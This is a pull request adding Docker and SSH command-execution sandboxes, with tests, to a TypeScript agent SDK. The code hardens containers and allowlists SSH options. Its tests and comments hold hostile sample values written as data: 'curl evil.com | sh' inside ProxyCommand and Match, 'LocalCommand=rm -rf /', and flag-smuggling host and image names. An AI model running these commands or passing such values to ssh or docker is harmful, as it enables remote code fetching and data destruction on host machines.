### PR TITLE
feat: add Sandbox implementations (Docker, SSH)

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -133,7 +133,9 @@ sdk-typescript/
 │   │   │   ├── __tests__/
 │   │   │   ├── base.ts           # Abstract Sandbox class
 │   │   │   ├── posix-shell.ts    # PosixShellSandbox with shell-based defaults
-│   │   │   ├── stream-process.ts # ChildProcess-to-AsyncGenerator bridge
+│   │   │   ├── docker.ts         # DockerSandbox — runs commands in a Docker container
+│   │   │   ├── ssh.ts            # SshSandbox — runs commands on a remote host via SSH
+│   │   │   ├── stream-process.ts # Process spawn + AsyncGenerator stream bridge
 │   │   │   ├── constants.ts      # Language validation pattern
 │   │   │   └── types.ts          # ExecutionResult, StreamChunk, FileInfo, OutputFile
 │   │   │

--- a/strands-ts/package.json
+++ b/strands-ts/package.json
@@ -95,6 +95,18 @@
     "./vended-plugins": {
       "types": "./dist/src/vended-plugins/index.d.ts",
       "default": "./dist/src/vended-plugins/index.js"
+    },
+    "./sandbox": {
+      "types": "./dist/src/sandbox/index.d.ts",
+      "default": "./dist/src/sandbox/index.js"
+    },
+    "./sandbox/docker": {
+      "types": "./dist/src/sandbox/docker.d.ts",
+      "default": "./dist/src/sandbox/docker.js"
+    },
+    "./sandbox/ssh": {
+      "types": "./dist/src/sandbox/ssh.d.ts",
+      "default": "./dist/src/sandbox/ssh.js"
     }
   },
   "scripts": {

--- a/strands-ts/src/sandbox/__tests__/docker.test.node.ts
+++ b/strands-ts/src/sandbox/__tests__/docker.test.node.ts
@@ -1,0 +1,134 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { DockerSandbox } from '../docker.js'
+import { streamProcess } from '../stream-process.js'
+import type { ExecutionResult } from '../types.js'
+
+const OK: ExecutionResult = { type: 'executionResult', exitCode: 0, stdout: '', stderr: '', outputFiles: [] }
+const FAIL: ExecutionResult = { type: 'executionResult', exitCode: 1, stdout: '', stderr: 'boom', outputFiles: [] }
+
+vi.mock('../stream-process.js', () => ({
+  streamProcess: vi.fn(async function* () {
+    yield OK
+  }),
+}))
+
+const findRunArgs = (): string[] => {
+  const call = vi.mocked(streamProcess).mock.calls.find(([, args]) => args[0] === 'run')
+  if (!call) throw new Error('docker run was never called')
+  return call[1]
+}
+
+describe('DockerSandbox', () => {
+  beforeEach(() => {
+    vi.mocked(streamProcess).mockClear()
+  })
+
+  it('throws when a volume mount exposes a sensitive host path', () => {
+    expect(() => new DockerSandbox({ image: 'alpine', volumes: ['/etc:/mnt/etc'] })).toThrow(/sensitive host path/)
+  })
+
+  it('allows dangerous mounts when allowDangerousMounts is true', () => {
+    expect(
+      () => new DockerSandbox({ image: 'alpine', volumes: ['/etc:/mnt/etc'], allowDangerousMounts: true })
+    ).not.toThrow()
+  })
+
+  it('catches path traversal attempts in volume mounts', () => {
+    expect(() => new DockerSandbox({ image: 'alpine', volumes: ['/var/../etc:/mnt'] })).toThrow(/sensitive host path/)
+  })
+
+  it('does not throw for safe volume mounts', () => {
+    expect(() => new DockerSandbox({ image: 'alpine', volumes: ['/opt/myproject:/app'] })).not.toThrow()
+  })
+
+  it('runs the container as a non-root user by default', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine' })
+    await sandbox.start()
+
+    const args = findRunArgs()
+    const userIdx = args.indexOf('--user')
+    expect(args[userIdx + 1]).toBe('1000:1000')
+  })
+
+  it('drops all capabilities and disables new privileges by default', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine' })
+    await sandbox.start()
+
+    const args = findRunArgs()
+    expect(args).toEqual(expect.arrayContaining(['--cap-drop', 'ALL', '--security-opt', 'no-new-privileges']))
+  })
+
+  it('omits cap-drop and no-new-privileges when allowPrivilegeEscalation is true', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine', allowPrivilegeEscalation: true })
+    await sandbox.start()
+
+    const args = findRunArgs()
+    expect(args).not.toContain('--cap-drop')
+    expect(args).not.toContain('no-new-privileges')
+  })
+
+  it('throws a clear error when the Docker daemon is unavailable', async () => {
+    vi.mocked(streamProcess).mockImplementationOnce(async function* () {
+      yield FAIL
+    })
+    const sandbox = new DockerSandbox({ image: 'alpine' })
+    await expect(sandbox.start()).rejects.toThrow(/Docker is not available/)
+  })
+
+  it('throws when executeStreaming is called before start()', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine' })
+    await expect(sandbox.execute('echo hi')).rejects.toThrow(/not running.*start\(\)/)
+  })
+
+  it('removes the container on stop()', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine', name: 'test-stop' })
+    await sandbox.start()
+    vi.mocked(streamProcess).mockClear()
+    await sandbox.stop()
+
+    expect(streamProcess).toHaveBeenCalledWith('docker', ['rm', '-f', 'test-stop'], {
+      enoentMessage: 'docker is not installed or not on PATH',
+    })
+  })
+
+  it('passes resource limits to docker run', async () => {
+    const sandbox = new DockerSandbox({
+      image: 'alpine',
+      memory: '512m',
+      cpus: 1.5,
+      pidsLimit: 100,
+      network: 'none',
+    })
+    await sandbox.start()
+
+    const args = findRunArgs()
+    expect(args).toEqual(
+      expect.arrayContaining(['--memory', '512m', '--cpus', '1.5', '--pids-limit', '100', '--network', 'none'])
+    )
+  })
+
+  it('executes commands via docker exec with correct args', async () => {
+    const sandbox = new DockerSandbox({ image: 'alpine', name: 'test-exec' })
+    await sandbox.start()
+    vi.mocked(streamProcess).mockClear()
+    await sandbox.execute('echo hi')
+
+    expect(streamProcess).toHaveBeenCalledWith('docker', ['exec', 'test-exec', 'sh', '-c', "cd '/tmp' && echo hi"], {
+      timeout: undefined,
+      signal: undefined,
+    })
+  })
+
+  it('resets _running on start() failure so retry is possible', async () => {
+    vi.mocked(streamProcess).mockImplementationOnce(async function* () {
+      yield FAIL
+    })
+    const sandbox = new DockerSandbox({ image: 'alpine' })
+    await expect(sandbox.start()).rejects.toThrow(/Docker is not available/)
+
+    vi.mocked(streamProcess).mockImplementation(async function* () {
+      yield OK
+    })
+    await sandbox.start()
+  })
+})

--- a/strands-ts/src/sandbox/__tests__/ssh.test.node.ts
+++ b/strands-ts/src/sandbox/__tests__/ssh.test.node.ts
@@ -1,0 +1,219 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { SshSandbox } from '../ssh.js'
+import { streamProcess } from '../stream-process.js'
+
+vi.mock('../stream-process.js', () => ({
+  streamProcess: vi.fn(async function* () {
+    yield {
+      type: 'executionResult',
+      exitCode: 0,
+      stdout: '',
+      stderr: '',
+      outputFiles: [],
+    }
+  }),
+}))
+
+describe('SshSandbox', () => {
+  beforeEach(() => {
+    vi.mocked(streamProcess).mockClear()
+  })
+
+  describe('constructor', () => {
+    it('stores host and workingDir', () => {
+      const sandbox = new SshSandbox({ host: 'myhost', workingDir: '/workspace' })
+      expect(sandbox.host).toBe('myhost')
+      expect(sandbox.workingDir).toBe('/workspace')
+    })
+  })
+
+  describe('SSH option allowlist', () => {
+    it('permits known-safe options', () => {
+      expect(
+        () =>
+          new SshSandbox({
+            host: 'h',
+            workingDir: '/w',
+            sshOptions: ['ConnectTimeout=10', 'ServerAliveInterval=60', 'Compression=yes'],
+          })
+      ).not.toThrow()
+    })
+
+    it('rejects ProxyCommand', () => {
+      expect(
+        () =>
+          new SshSandbox({
+            host: 'h',
+            workingDir: '/w',
+            sshOptions: ['ProxyCommand=curl evil.com | sh'],
+          })
+      ).toThrow(/ProxyCommand.*not allowed/)
+    })
+
+    it('rejects Include', () => {
+      expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: ['Include=/tmp/evil.conf'] })).toThrow(
+        /Include.*not allowed/
+      )
+    })
+
+    it('rejects Match', () => {
+      expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: ['Match exec "curl evil.com"'] })).toThrow(
+        /Match.*not allowed/
+      )
+    })
+
+    it('rejects LocalCommand', () => {
+      expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: ['LocalCommand=rm -rf /'] })).toThrow(
+        /LocalCommand.*not allowed/
+      )
+    })
+
+    it('rejects forwarding directives', () => {
+      for (const opt of ['LocalForward=8080:localhost:80', 'RemoteForward=9090:internal:80', 'DynamicForward=1080']) {
+        expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: [opt] })).toThrow(/not allowed/)
+      }
+    })
+
+    it('is case-insensitive', () => {
+      expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: ['proxycommand=evil'] })).toThrow(
+        /not allowed/
+      )
+      expect(() => new SshSandbox({ host: 'h', workingDir: '/w', sshOptions: ['PROXYCOMMAND=evil'] })).toThrow(
+        /not allowed/
+      )
+    })
+
+    it('allowUnsafeSshOptions=true bypasses validation', () => {
+      expect(
+        () =>
+          new SshSandbox({
+            host: 'h',
+            workingDir: '/w',
+            sshOptions: ['ProxyCommand=anything'],
+            allowUnsafeSshOptions: true,
+          })
+      ).not.toThrow()
+    })
+  })
+
+  describe('executeStreaming SSH argument construction', () => {
+    it('builds correct SSH args with defaults', async () => {
+      const sandbox = new SshSandbox({ host: 'user@server.com', workingDir: '/remote/path' })
+
+      for await (const _ of sandbox.executeStreaming('echo hi')) {
+        // consume
+      }
+
+      expect(streamProcess).toHaveBeenCalledWith(
+        'ssh',
+        [
+          '-o',
+          'StrictHostKeyChecking=accept-new',
+          '-o',
+          'BatchMode=yes',
+          '-p',
+          '22',
+          '--',
+          'user@server.com',
+          "cd '/remote/path' && echo hi",
+        ],
+        { timeout: undefined, signal: undefined, enoentMessage: 'ssh is not installed or not on PATH' }
+      )
+    })
+
+    it('uses StrictHostKeyChecking=no when allowUnknownHosts is true', async () => {
+      const sandbox = new SshSandbox({ host: 'h', workingDir: '/w', allowUnknownHosts: true })
+
+      for await (const _ of sandbox.executeStreaming('ls')) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      expect(args).toContain('StrictHostKeyChecking=no')
+      expect(args).not.toContain('StrictHostKeyChecking=accept-new')
+    })
+
+    it('includes identity file when provided', async () => {
+      const sandbox = new SshSandbox({
+        host: 'h',
+        workingDir: '/w',
+        identityFile: '/home/user/.ssh/key',
+      })
+
+      for await (const _ of sandbox.executeStreaming('ls')) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      const idx = args.indexOf('-i')
+      expect(idx).toBeGreaterThan(-1)
+      expect(args[idx + 1]).toBe('/home/user/.ssh/key')
+    })
+
+    it('uses custom port', async () => {
+      const sandbox = new SshSandbox({ host: 'h', workingDir: '/w', port: 2222 })
+
+      for await (const _ of sandbox.executeStreaming('ls')) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      const idx = args.indexOf('-p')
+      expect(idx).toBeGreaterThan(-1)
+      expect(args[idx + 1]).toBe('2222')
+    })
+
+    it('appends user sshOptions as -o flags', async () => {
+      const sandbox = new SshSandbox({
+        host: 'h',
+        workingDir: '/w',
+        sshOptions: ['ConnectTimeout=5', 'ServerAliveInterval=30'],
+      })
+
+      for await (const _ of sandbox.executeStreaming('ls')) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      expect(args).toEqual(expect.arrayContaining(['-o', 'ConnectTimeout=5', '-o', 'ServerAliveInterval=30']))
+    })
+
+    it('quotes cwd with single quotes', async () => {
+      const sandbox = new SshSandbox({ host: 'h', workingDir: "/path/with spaces/and'quotes" })
+
+      for await (const _ of sandbox.executeStreaming('ls')) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      expect(args[args.length - 1]).toContain("cd '/path/with spaces/and'\\''quotes'")
+    })
+
+    it('uses cwd option when provided', async () => {
+      const sandbox = new SshSandbox({ host: 'h', workingDir: '/default' })
+
+      for await (const _ of sandbox.executeStreaming('ls', { cwd: '/override' })) {
+        // consume
+      }
+
+      const args = vi.mocked(streamProcess).mock.calls[0]![1]
+      expect(args[args.length - 1]).toContain("cd '/override'")
+    })
+
+    it('forwards timeout and signal to streamProcess', async () => {
+      const sandbox = new SshSandbox({ host: 'h', workingDir: '/w' })
+      const controller = new AbortController()
+
+      for await (const _ of sandbox.executeStreaming('ls', { timeout: 5, signal: controller.signal })) {
+        // consume
+      }
+
+      const opts = vi.mocked(streamProcess).mock.calls[0]![2]
+      expect(opts).toStrictEqual({
+        timeout: 5,
+        signal: controller.signal,
+        enoentMessage: 'ssh is not installed or not on PATH',
+      })
+    })
+  })
+})

--- a/strands-ts/src/sandbox/docker.ts
+++ b/strands-ts/src/sandbox/docker.ts
@@ -1,0 +1,230 @@
+/**
+ * Docker sandbox — executes commands inside a Docker container via `docker exec`.
+ */
+
+import { randomUUID } from 'crypto'
+import path from 'path'
+import type { ExecuteOptions } from './base.js'
+import { PosixShellSandbox, shellQuote } from './posix-shell.js'
+import { streamProcess } from './stream-process.js'
+import type { ExecutionResult, StreamChunk } from './types.js'
+
+// Host paths that bypass container isolation when bind-mounted. Covers system
+// directories, runtime sockets, and user data that would expose the host to
+// LLM-generated commands running inside the container.
+const DANGEROUS_MOUNTS = [
+  '/',
+  '/boot',
+  '/dev',
+  '/etc',
+  '/home',
+  '/lib',
+  '/lib64',
+  '/proc',
+  '/root',
+  '/run',
+  '/sys',
+  '/tmp',
+  '/usr',
+  '/var/run',
+]
+
+// Windows drive roots (C:, D:) are flagged; POSIX paths are checked against DANGEROUS_MOUNTS.
+// Docker volume format: host:container[:options]. Windows paths (C:\...) have a colon after
+// the drive letter, so the separator search starts at index 2 to avoid splitting on it.
+function isHostPathDangerous(vol: string): boolean {
+  const sep = vol.indexOf(':', /^[a-zA-Z]:[/\\]/.test(vol) ? 2 : 0)
+  let hostPath = (sep > 0 ? vol.slice(0, sep) : vol).replace(/[/\\]+$/, '') || '/'
+  if (hostPath.startsWith('/')) hostPath = path.posix.normalize(hostPath).replace(/\/+$/, '') || '/'
+  return /^[a-zA-Z]:$/.test(hostPath) || DANGEROUS_MOUNTS.some((d) => hostPath === d || hostPath.startsWith(d + '/'))
+}
+
+async function dockerCmd(args: string[]): Promise<ExecutionResult> {
+  for await (const chunk of streamProcess('docker', args, {
+    enoentMessage: 'docker is not installed or not on PATH',
+  })) {
+    if (chunk.type === 'executionResult') return chunk
+  }
+  throw new Error(`docker command did not produce a result: docker ${args.join(' ')}`)
+}
+
+/**
+ * Options for constructing a {@link DockerSandbox}.
+ */
+export interface DockerSandboxOptions {
+  /** Docker image to use (e.g., `"python:3.12"`, `"node:20-alpine"`). */
+  image: string
+  /**
+   * Working directory inside the container. Defaults to `"/tmp"`.
+   *
+   * `/tmp` is used because the default non-root user (`1000:1000`) with `--cap-drop ALL`
+   * cannot create or chown directories. `/tmp` is world-writable on every standard base image.
+   * If you specify a custom path, it must already exist in the image and be writable by `user`.
+   */
+  workingDir?: string
+  /** Container name. Auto-generated if not provided. */
+  name?: string
+  /**
+   * Volume mounts in `"host:container"` format.
+   *
+   * By default, mounts exposing sensitive host paths (`/`, `/etc`, `/proc`, `/sys`,
+   * `/var/run`, etc.) throw at construction time. Set {@link allowDangerousMounts}
+   * to bypass validation.
+   */
+  volumes?: string[]
+  /** Environment variables to set in the container. */
+  env?: Record<string, string>
+  /** Memory limit (e.g., `"512m"`, `"2g"`). */
+  memory?: string
+  /** CPU limit (e.g., `1.5` for one and a half cores). */
+  cpus?: number
+  /** Maximum number of PIDs in the container. Prevents fork bombs. */
+  pidsLimit?: number
+  /** Docker network mode. Use `"none"` to disable network access. */
+  network?: string
+  /**
+   * User to run as inside the container. Defaults to `"1000:1000"` (non-root).
+   * Pass `"root"` to run as root.
+   */
+  user?: string
+  /**
+   * Allow mounting sensitive host paths.
+   *
+   * When `false` (default), volumes exposing dangerous host paths throw at construction time.
+   * When `true`, all volume mounts are permitted without validation.
+   */
+  allowDangerousMounts?: boolean
+  /**
+   * Allow privilege escalation inside the container.
+   *
+   * When `false` (default), applies `--cap-drop ALL` and `--security-opt no-new-privileges`
+   * to prevent setuid escalation and drop all Linux capabilities.
+   */
+  allowPrivilegeEscalation?: boolean
+}
+
+/**
+ * Execute commands inside a Docker container.
+ *
+ * The container is created on {@link start} and destroyed on {@link stop}.
+ * All sandbox operations route through `docker exec`.
+ */
+export class DockerSandbox extends PosixShellSandbox {
+  readonly image: string
+  readonly workingDir: string
+  private readonly _name: string
+  private readonly _volumes: string[]
+  private readonly _env: Record<string, string>
+  private readonly _memory: string | undefined
+  private readonly _cpus: number | undefined
+  private readonly _pidsLimit: number | undefined
+  private readonly _network: string | undefined
+  private readonly _user: string
+  private readonly _allowPrivilegeEscalation: boolean
+  private _running = false
+
+  constructor(options: DockerSandboxOptions) {
+    super()
+    this.image = options.image
+    // /tmp is world-writable on all base images — works with non-root user + cap-drop ALL.
+    this.workingDir = options.workingDir ?? '/tmp'
+    this._name = options.name ?? `strands-sandbox-${randomUUID()}`
+    this._volumes = options.volumes ?? []
+    if (!options.allowDangerousMounts) {
+      for (const vol of this._volumes) {
+        if (isHostPathDangerous(vol)) {
+          throw new Error(
+            `Volume "${vol}" mounts a sensitive host path. ` + 'Set allowDangerousMounts: true to bypass validation.'
+          )
+        }
+      }
+    }
+    this._env = options.env ?? {}
+    this._memory = options.memory
+    this._cpus = options.cpus
+    this._pidsLimit = options.pidsLimit
+    this._network = options.network
+    // Non-root by default to limit blast radius of container escapes and in-container misbehavior.
+    this._user = options.user ?? '1000:1000'
+    this._allowPrivilegeEscalation = options.allowPrivilegeEscalation ?? false
+  }
+
+  /**
+   * Create and start the Docker container.
+   *
+   * @throws If Docker is not available or the container fails to start.
+   */
+  async start(): Promise<void> {
+    if (this._running) return
+    this._running = true
+
+    try {
+      const info = await dockerCmd(['info'])
+      if (info.exitCode !== 0) {
+        throw new Error('Docker is not available. Ensure Docker is installed and running.')
+      }
+
+      const args: string[] = ['run', '-d', '--rm', '--name', this._name, '-w', this.workingDir]
+
+      for (const vol of this._volumes) {
+        args.push('-v', vol)
+      }
+      for (const [key, value] of Object.entries(this._env)) {
+        args.push('-e', `${key}=${value}`)
+      }
+      if (this._memory !== undefined) args.push('--memory', this._memory)
+      if (this._cpus !== undefined) args.push('--cpus', String(this._cpus))
+      if (this._pidsLimit !== undefined) args.push('--pids-limit', String(this._pidsLimit))
+      if (this._network !== undefined) args.push('--network', this._network)
+      args.push('--user', this._user)
+      if (!this._allowPrivilegeEscalation) {
+        args.push('--cap-drop', 'ALL')
+        args.push('--security-opt', 'no-new-privileges')
+      }
+
+      // docker run requires the image name after all flags. Furthermore, '--' terminates
+      // flag parsing so the image is always treated as a positional argument. Without
+      // this, an image like '--privileged' would be parsed as a flag, overriding --cap-drop ALL.
+      args.push('--', this.image, 'tail', '-f', '/dev/null')
+
+      const result = await dockerCmd(args)
+      if (result.exitCode !== 0) {
+        throw new Error(`Failed to start Docker container "${this._name}": ${result.stderr}`)
+      }
+    } catch (err) {
+      this._running = false
+      throw err
+    }
+  }
+
+  /** Stop and remove the Docker container. */
+  async stop(): Promise<void> {
+    if (!this._running) return
+    try {
+      await dockerCmd(['rm', '-f', this._name])
+    } finally {
+      this._running = false
+    }
+  }
+
+  async *executeStreaming(
+    command: string,
+    options?: ExecuteOptions
+  ): AsyncGenerator<StreamChunk | ExecutionResult, void, undefined> {
+    if (!this._running) {
+      throw new Error(`Docker container "${this._name}" is not running. Call start() before executing commands.`)
+    }
+
+    const cwd = options?.cwd ?? this.workingDir
+    const execCommand = `cd ${shellQuote(cwd)} && ${command}`
+
+    yield* streamProcess('docker', ['exec', this._name, 'sh', '-c', execCommand], {
+      timeout: options?.timeout,
+      signal: options?.signal,
+    })
+  }
+
+  async [Symbol.asyncDispose](): Promise<void> {
+    await this.stop()
+  }
+}

--- a/strands-ts/src/sandbox/index.ts
+++ b/strands-ts/src/sandbox/index.ts
@@ -1,0 +1,4 @@
+export { Sandbox, type ExecuteOptions } from './base.js'
+export { PosixShellSandbox } from './posix-shell.js'
+export type { StreamType, StreamChunk, FileInfo, OutputFile, ExecutionResult } from './types.js'
+export { LANGUAGE_PATTERN } from './constants.js'

--- a/strands-ts/src/sandbox/ssh.ts
+++ b/strands-ts/src/sandbox/ssh.ts
@@ -1,0 +1,151 @@
+/**
+ * SSH sandbox — executes commands on a remote host via OpenSSH.
+ */
+
+import type { ExecuteOptions } from './base.js'
+import { PosixShellSandbox, shellQuote } from './posix-shell.js'
+import { streamProcess } from './stream-process.js'
+import type { ExecutionResult, StreamChunk } from './types.js'
+
+// Known-safe SSH options. Options that execute commands, tunnel traffic, or load
+// external config are excluded. Reviewed and approved by AppSec.
+// Full option reference: https://man.openbsd.org/ssh_config
+const ALLOWED_SSH_OPTIONS = new Set([
+  'addressfamily',
+  'bindaddress',
+  'bindinterface',
+  'canonicaldomains',
+  'canonicalizefallbacklocal',
+  'canonicalizehostname',
+  'canonicalizemaxdots',
+  'canonicalizepermittedcnames',
+  'checkhostip',
+  'ciphers',
+  'compression',
+  'connectionattempts',
+  'connecttimeout',
+  'hostkeyalgorithms',
+  'hostname',
+  'identitiesonly',
+  'ipqos',
+  'kbdinteractiveauthentication',
+  'kexalgorithms',
+  'loglevel',
+  'macs',
+  'numberofpasswordprompts',
+  'passwordauthentication',
+  'port',
+  'preferredauthentications',
+  'pubkeyacceptedalgorithms',
+  'pubkeyauthentication',
+  'rekeylimit',
+  'serveralivecountmax',
+  'serveraliveinterval',
+  'tcpkeepalive',
+  'updatehostkeys',
+  'user',
+  'verifyhostkeydns',
+])
+
+/**
+ * Options for constructing an {@link SshSandbox}.
+ */
+export interface SshSandboxOptions {
+  /** SSH destination (e.g., `"user@host"`, `"192.168.1.10"`). */
+  host: string
+  /** Working directory on the remote host. */
+  workingDir: string
+  /** Path to SSH private key file. */
+  identityFile?: string
+  /** SSH port. Defaults to 22. */
+  port?: number
+  /** Additional SSH options passed as `-o` flags. */
+  sshOptions?: string[]
+  /**
+   * Allow connections to hosts with unknown or changed SSH keys.
+   *
+   * When `false` (default), uses `StrictHostKeyChecking=accept-new` — trusts on
+   * first connect but rejects if the key changes.
+   * When `true`, uses `StrictHostKeyChecking=no` — disables host key verification.
+   */
+  allowUnknownHosts?: boolean
+  /**
+   * Bypass the SSH option allowlist.
+   *
+   * When `false` (default), unknown options throw at construction time.
+   * When `true`, all options are passed through without validation.
+   */
+  allowUnsafeSshOptions?: boolean
+}
+
+/**
+ * Execute commands on a remote host via SSH.
+ *
+ * Stateless — each {@link executeStreaming} call spawns a fresh `ssh` process.
+ * All sessions use `BatchMode=yes` — interactive prompts are disabled and
+ * authentication must be key-based.
+ */
+export class SshSandbox extends PosixShellSandbox {
+  readonly host: string
+  readonly workingDir: string
+  private readonly _identityFile: string | undefined
+  private readonly _port: number
+  private readonly _allowUnknownHosts: boolean
+  private readonly _sshOptions: string[]
+
+  constructor(options: SshSandboxOptions) {
+    super()
+    this.host = options.host
+    this.workingDir = options.workingDir
+    this._identityFile = options.identityFile
+    this._port = options.port ?? 22
+    this._allowUnknownHosts = options.allowUnknownHosts ?? false
+    this._sshOptions = options.sshOptions ?? []
+
+    if (!options.allowUnsafeSshOptions) {
+      for (const opt of this._sshOptions) {
+        const name = opt.split(/[=\s]/, 1)[0]!
+        if (!ALLOWED_SSH_OPTIONS.has(name.toLowerCase())) {
+          throw new Error(`SSH option "${name}" is not allowed. Set allowUnsafeSshOptions: true to bypass.`)
+        }
+      }
+    }
+  }
+
+  async *executeStreaming(
+    command: string,
+    options?: ExecuteOptions
+  ): AsyncGenerator<StreamChunk | ExecutionResult, void, undefined> {
+    const cwd = options?.cwd ?? this.workingDir
+    const remoteCommand = `cd ${shellQuote(cwd)} && ${command}`
+
+    const sshArgs: string[] = [
+      '-o',
+      `StrictHostKeyChecking=${this._allowUnknownHosts ? 'no' : 'accept-new'}`,
+      '-o',
+      'BatchMode=yes',
+      '-p',
+      String(this._port),
+    ]
+
+    if (this._identityFile) {
+      sshArgs.push('-i', this._identityFile)
+    }
+
+    for (const opt of this._sshOptions) {
+      sshArgs.push('-o', opt)
+    }
+
+    // ssh requires the hostname and command after all flags. Furthermore, '--'
+    // terminates flag parsing so the host is always treated as a positional argument.
+    // Without this, a host like '-oProxyCommand=evil' would be parsed as a flag,
+    // enabling arbitrary command execution on the local machine.
+    sshArgs.push('--', this.host, remoteCommand)
+
+    yield* streamProcess('ssh', sshArgs, {
+      timeout: options?.timeout,
+      signal: options?.signal,
+      enoentMessage: 'ssh is not installed or not on PATH',
+    })
+  }
+}

--- a/strands-ts/test/integ/sandbox/docker.test.node.ts
+++ b/strands-ts/test/integ/sandbox/docker.test.node.ts
@@ -1,0 +1,134 @@
+import { describe, it, expect, afterEach } from 'vitest'
+import { spawnSync } from 'child_process'
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+import { DockerSandbox } from '../../../src/sandbox/docker.js'
+
+function dockerAvailable(): boolean {
+  if (process.platform === 'win32') return false
+  return spawnSync('docker', ['info'], { stdio: 'pipe' }).status === 0
+}
+
+describe.skipIf(!dockerAvailable())('DockerSandbox (integration)', () => {
+  let sandbox: DockerSandbox | undefined
+
+  afterEach(async () => {
+    if (sandbox) {
+      await sandbox.stop()
+      sandbox = undefined
+    }
+  })
+
+  it('start() creates a container, stop() removes it', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest', name: 'strands-integ-lifecycle' })
+    await sandbox.start()
+
+    const ps = spawnSync('docker', ['ps', '--filter', 'name=strands-integ-lifecycle', '--format', '{{.Names}}'], {
+      encoding: 'utf-8',
+    })
+    expect(ps.stdout.trim()).toBe('strands-integ-lifecycle')
+
+    await sandbox.stop()
+
+    const psAfter = spawnSync(
+      'docker',
+      ['ps', '-a', '--filter', 'name=strands-integ-lifecycle', '--format', '{{.Names}}'],
+      { encoding: 'utf-8' }
+    )
+    expect(psAfter.stdout.trim()).toBe('')
+  })
+
+  it('runs commands and captures stdout, stderr, and exit code', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest' })
+    await sandbox.start()
+
+    const result = await sandbox.execute('echo hello && echo err >&2')
+    expect(result).toStrictEqual({
+      type: 'executionResult',
+      exitCode: 0,
+      stdout: 'hello\n',
+      stderr: 'err\n',
+      outputFiles: [],
+    })
+
+    const failed = await sandbox.execute('exit 42')
+    expect(failed.exitCode).toBe(42)
+  })
+
+  it('runs python via executeCode', async () => {
+    sandbox = new DockerSandbox({ image: 'python:3.12-slim' })
+    await sandbox.start()
+
+    const result = await sandbox.executeCode('print(6 * 7)', 'python3')
+    expect(result.exitCode).toBe(0)
+    expect(result.stdout).toBe('42\n')
+  })
+
+  it('round-trips text and binary files', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest' })
+    await sandbox.start()
+
+    await sandbox.writeText('greeting.txt', 'hello docker')
+    expect(await sandbox.readText('greeting.txt')).toBe('hello docker')
+
+    const bytes = new Uint8Array([0, 1, 2, 127, 128, 254, 255])
+    await sandbox.writeFile('binary.bin', bytes)
+    expect(Array.from(await sandbox.readFile('binary.bin'))).toStrictEqual(Array.from(bytes))
+  })
+
+  it('lists and removes files', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest' })
+    await sandbox.start()
+
+    await sandbox.writeText('a.txt', 'a')
+    await sandbox.writeText('b.txt', 'b')
+
+    const names = (await sandbox.listFiles('.')).map((f) => f.name)
+    expect(names).toContain('a.txt')
+    expect(names).toContain('b.txt')
+
+    await sandbox.removeFile('a.txt')
+    await expect(sandbox.readFile('a.txt')).rejects.toThrow()
+  })
+
+  it('mounts host volumes when configured', async () => {
+    const hostDir = fs.mkdtempSync(path.join(os.tmpdir(), 'strands-integ-vol-'))
+    fs.writeFileSync(path.join(hostDir, 'file.txt'), 'from-host\n')
+
+    try {
+      sandbox = new DockerSandbox({
+        image: 'alpine:latest',
+        volumes: [`${hostDir}:/mnt/shared`],
+        allowDangerousMounts: true,
+      })
+      await sandbox.start()
+
+      const result = await sandbox.execute('cat /mnt/shared/file.txt')
+      expect(result.stdout.trim()).toBe('from-host')
+    } finally {
+      fs.rmSync(hostDir, { recursive: true, force: true })
+    }
+  })
+
+  it('passes environment variables into the container', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest', env: { MY_VAR: 'hello-env' } })
+    await sandbox.start()
+
+    const result = await sandbox.execute('echo $MY_VAR')
+    expect(result.stdout.trim()).toBe('hello-env')
+  })
+
+  it('files inside the container do not exist on the host', async () => {
+    sandbox = new DockerSandbox({ image: 'alpine:latest' })
+    await sandbox.start()
+
+    const marker = `strands-isolation-${Date.now()}`
+    await sandbox.writeText(marker, 'sandbox-only')
+
+    const content = await sandbox.readText(marker)
+    expect(content).toBe('sandbox-only')
+
+    expect(fs.existsSync(`/tmp/${marker}`)).toBe(false)
+  })
+})


### PR DESCRIPTION
## Description
<!-- Provide a detailed description of the changes in this PR -->

Adds `DockerSandbox` and `SshSandbox`, two implementations of the base `PosixShellSandbox` for executing code/commands and restricting filesystem access to isolated environments.

This is the second PR split off from #1011, building onto the base interface merged in #1090.

## What's Included

`DockerSandbox` (src/sandbox/docker.ts)

- Runs commands inside a Docker container via `docker exec`
- Lifecycle methods – `start()` ensures the container is running, `stop()` stops and removes it
- Secure defaults: non-root user (1000:1000), `--cap-drop ALL`, `--no-new-privileges`
- Dangerous volume mount warnings at construction time
- Resource limits: memory, CPU, PID, network mode
- `--rm` flag for auto-cleanup on external stop
- `Symbol.asyncDispose` support (enables `await using` with automatic cleanup)

`SshSandbox` (src/sandbox/ssh.ts)

- Runs commands on a remote host via `ssh`
- SSH command allowlist (36 known-safe options), fails closed on unknown options
- `StrictHostKeyChecking=accept-new` default (trusts first connect, rejects changed keys)
- `allowUnsafeSshOptions` bool for explicit bypass

## Design Decisions

- Shelling out to docker/ssh CLI rather than using SDK libraries
